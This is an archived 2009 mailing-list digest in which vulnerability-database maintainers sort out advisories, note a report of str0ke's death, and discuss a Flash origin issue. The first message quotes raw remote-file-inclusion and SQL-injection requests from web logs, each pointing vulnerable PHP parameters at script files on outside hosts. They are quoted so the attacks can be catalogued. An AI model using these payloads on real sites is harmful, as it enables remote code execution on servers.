From jericho at attrition.org Sun Nov 1 04:33:57 2009 From: jericho at attrition.org (security curmudgeon) Date: Sun, 1 Nov 2009 04:33:57 +0000 (UTC) Subject: [VIM] recent round of RFI from logs In-Reply-To: References: Message-ID: On Thu, 3 Apr 2008, security curmudgeon wrote: : Quick searches didn't find these in OSVDB. I haven't had time to check : the other VDBs. new ones: /event/list.asp?c=e%2Ename+like+%27B%25%27&all=1 /plugins/spamx/MassDelete.Admin.class.php/geeklog/plugins/spamx/BaseAdmin.class.php?_CONF%5bpath%5d=http://lanaalaadi.com/gallery/data/media/2/3/db.txt%3f%3f IMGallery galeria.php kategoria Parameter SQL Injection RFI too? /pipermail/vim/2006-June.txt%20%20//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1??? /includes/class_item.php?fileExtension=http://www.diakonia-jkt.sch.id/upload/id1?? /bbshop/admin/admin.php?_shop_path=http://www.diakonia-jkt.sch.id/upload/id1??? /index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.miomatrimonio.com/editor/aid.txt%3f%3f /modules/xfsection/modify.php?GALLERY_BASEDIR=http://fmmkor.org/zboard/data/mission/1.swf From jericho at attrition.org Wed Nov 4 07:56:53 2009 From: jericho at attrition.org (security curmudgeon) Date: Wed, 4 Nov 2009 07:56:53 +0000 (UTC) Subject: [VIM] report that str0ke has passed Message-ID: http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html Tuesday, November 3, 2009 Str0ke @ Milworm's Funeral is This Friday Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child. Sadly.... I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend. We wish nothing but blessing to his wife and 4 children. RIP str0ke 1974-04-29 - 2009-11-03 09:23 :o( Posted by [bl4ck] at 10:26 PM From coley at linus.mitre.org Wed Nov 4 13:21:21 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 4 Nov 2009 08:21:21 -0500 (EST) Subject: [VIM] PSArt ? Message-ID: BUGTRAQ:20091030 PSAtr v1.2 Sql Injection OK, so nearly everybody in the VDB world is listing the PSArt 1.5 news.asp id SQL injection vulnerability, but I can't figure out who the vendor is and whether it's even site-specific or not. I don't see any vendor links in the DBs. Does anybody have something conclusive? - Steve From theall at tenablesecurity.com Wed Nov 4 14:16:49 2009 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 4 Nov 2009 09:16:49 -0500 Subject: [VIM] PSArt ? In-Reply-To: References: Message-ID: On Nov 4, 2009, at 8:21 AM, Steven M. Christey wrote: > > BUGTRAQ:20091030 PSAtr v1.2 Sql Injection > > OK, so nearly everybody in the VDB world is listing the PSArt 1.5 > news.asp > id SQL injection vulnerability, but I can't figure out who the > vendor is > and whether it's even site-specific or not. I don't see any vendor > links > in the DBs. Does anybody have something conclusive? Conclusive, no, but I turned up some sites running it by googling for 'inurl:"news.asp" "PSArt'. It seems to be a Chinese language app from http://www.PSArt.com.cn/ , which now seems to be parked. I don't read Chinese, though, so I could be totally off the mark. George -- theall at tenablesecurity.com From sanhill at us.ibm.com Wed Nov 4 15:48:36 2009 From: sanhill at us.ibm.com (Sandra Hill) Date: Wed, 4 Nov 2009 10:48:36 -0500 Subject: [VIM] report that str0ke has passed In-Reply-To: References: Message-ID: st0ke from beyond the grave :) http://twitter.com/str0ke/statuses/5422531377 Sandra Hill Security Analyst, X-Force Database Team Direct: +1 (404) 236 3297 Mail: sanhill at us.ibm.com Web: www.ibm.com / www.iss.net From: security curmudgeon To: vim at attrition.org Date: 11/04/2009 02:57 AM Subject: [VIM] report that str0ke has passed Sent by: vim-bounces at attrition.org http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html Tuesday, November 3, 2009 Str0ke @ Milworm's Funeral is This Friday Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child. Sadly.... I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend. We wish nothing but blessing to his wife and 4 children. RIP str0ke 1974-04-29 - 2009-11-03 09:23 :o( Posted by [bl4ck] at 10:26 PM -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20091104/c5f54946/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: graycol.gif Type: image/gif Size: 105 bytes Desc: not available Url : http://www.attrition.org/pipermail/vim/attachments/20091104/c5f54946/attachment.gif -------------- next part -------------- A non-text attachment was scrubbed... Name: ecblank.gif Type: image/gif Size: 45 bytes Desc: not available Url : http://www.attrition.org/pipermail/vim/attachments/20091104/c5f54946/attachment-0001.gif From 1293723872879014599 at mail.orkut.com Mon Nov 16 13:19:14 2009 From: 1293723872879014599 at mail.orkut.com (Dennis Groves) Date: Mon, 16 Nov 2009 13:19:14 +0000 Subject: [VIM] orkut - Dennis Groves wants you to join orkut! Message-ID: <1258377554.22.1293723872879014599.4.17305302649282842888@mail.orkut.com> Dennis Groves wants you to join orkut. Join now! http://www.orkut.com/Join.aspx?id=4B00EEDDB6E686A1&mt=22 * * * What you can do on orkut: - CONNECT with friends and family using scraps and instant messaging - DISCOVER new people through friends of friends and communities - SHARE your videos, pictures, and passions all in one place Help Center: http://help.orkut.com/support/ * * * Flooded inbox? Block all orkut users from sending you email by going to: http://www.orkut.com/Block.aspx?mt=22 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://www.attrition.org/pipermail/vim/attachments/20091116/9f2db46f/attachment.html From jericho at attrition.org Sun Nov 22 20:08:29 2009 From: jericho at attrition.org (security curmudgeon) Date: Sun, 22 Nov 2009 20:08:29 +0000 (UTC) Subject: [VIM] Adobe Flash - vuln or just "design"? Message-ID: Vuln writeup: http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html Press: http://www.scmagazineus.com/Researcher-finds-frighteningly-bad-Flash-flaw/article/157734/ Vendor response: http://blogs.adobe.com/asset/2009/11/flash_content_and_the_same-ori.html From jericho at attrition.org Mon Nov 23 00:28:18 2009 From: jericho at attrition.org (security curmudgeon) Date: Mon, 23 Nov 2009 00:28:18 +0000 (UTC) Subject: [VIM] FCKeditor -> CKEditor Message-ID: They have recently renamed the product. http://ckeditor.com/what-is-ckeditor